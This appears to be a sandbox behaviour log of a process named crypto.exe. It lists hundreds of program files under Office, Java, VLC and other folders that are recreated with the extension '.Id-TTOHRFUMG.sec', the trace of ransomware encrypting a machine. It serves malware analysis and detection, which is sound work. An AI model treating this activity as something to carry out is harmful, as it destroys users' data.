File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-windows.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist_jstree.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libts_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_dot.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\1047x576black.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Vancouver.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-modules-appui.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04326_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\icudt36.dll	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\btn-previous-static.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BOAT.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02291U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationRight_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0172067.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21339_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR26F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\OMSMMS.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Cairo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00943_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBBA\MSPUB7.BDR.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Flyout_Thumbnail_Shadow.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\images\cursors\win32_LinkDrop32x32.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-openide-compat.xml_hidden.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02448_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\NL7MODELS000C.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cuiaba.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0241037.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_h.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Heart_VideoInset.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-heapdump.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-views.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0281640.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR7B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\WebToolIconImagesMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\FAX\UrbanFax.Dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\extensions\VLSub.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Hermosillo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libasf_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-plaf.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR31F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\custom.lua.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\ConnectSelect.dib.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\OriginReport.Dotx.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MSOHEV.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSTORE_K_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt	crypto.exe
File created	C:\Program Files\Java\jre7\bin\kinit.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\WITHCOMP.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\83.0.4103.106\83.0.4103.106_chrome_installer.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-spi-quicksearch_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfontj2d.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.ja_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00784_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01858_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02106_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\BCSSync.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\Microsoft.Office.InfoPath.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\notConnectedStateIcon.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\1047x576black.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_de.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153265.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_thunderstorm.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\bod_r.TTF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\StatusAway.ico.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGWEBHD.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_gu.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\EmptyDatabase.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_hover.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\dtplugin\deployJava1.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms_3.6.100.v20140422-1825.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Atlantic\Madeira.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\XML Files\StarterApplicationDescriptors.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OISGRAPH.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkClientCP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\GMT+7.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239967.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\OUTDR_01.MID.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\deploy\messages_sv.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiler.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0215210.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00837_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0293236.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground_PAL.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Guayaquil.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0238959.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR18F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\packetizer\libpacketizer_copy_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\java-rmi.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR16F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libsamplerate_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\localedata.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-charts_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\REMOTEL.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsHomePageStyle.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Casual.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MSAEXP30.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\zh-cn.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD05119_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\Xlate_Complete.xsn.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libsubstx3g_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-openide-execution.xml_hidden.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\BORDERS\MSART6.BDR.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libaom_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\settings.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00732_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Slipstream.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\Certificates\groove.net\Components\SignedComponents.cer.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\chrome_elf.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\java_crw_demo.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands_0.10.2.v20140424-2344.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105280.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.THD.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\dial_sml.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\15x15dot.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\POLICIES.FDT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\logger\libfile_logger_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\J0143752.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Black Tie.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\photoedge_videoinset.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OLKFSTUB.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_right_pressed.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR17F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0086384.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195772.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200273.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR30F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\SMIMEE.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libcc_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\triangle.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi_3.10.1.v20140909-1633.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\OIS.HXS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\BCSClientManifest.man.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01143_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0106208.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-attach.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0090027.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02522_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00211_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\OUTLOOK_F_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ADDINS\ACCOLK.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Mail\oeimport.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\org-openide-filesystems.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\buttonDown_On.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Nauru.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD10890_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0106124.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\J0143753.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\Invite or Link.one.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02116_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\LINEAR_RGB.pf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0297727.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_sun.png.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0237336.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Novosibirsk.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10255_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115868.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME50.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\SegoeChess.ttf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationLeft_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Paramaribo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01586_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0296279.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\DataViewIconImagesMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\viewSelectionChanged.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGACCBOX.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationRight_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sa.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\MarkupIconImagesMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\SWBELL.NET.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\RECALL.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\orbd.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_alignleft.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\PS2SWOOS.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfigInternal.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CRANINST.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationUp_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02503U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10302_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\mng2.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic 2.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_SlateBlue.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_double_orange.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099178.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Swirl\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_th.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-oql.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\JdbcOdbc.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Indiana\Marengo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color48.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02950_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\Certificates\groove.net\ManagedObjects\SignedManagedObjects.cer.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\gadget.xml.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-attach.jar.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\validation.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-snaptracer.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01084_.WMF.Id-TTOHRFUMG.sec	crypto.exe
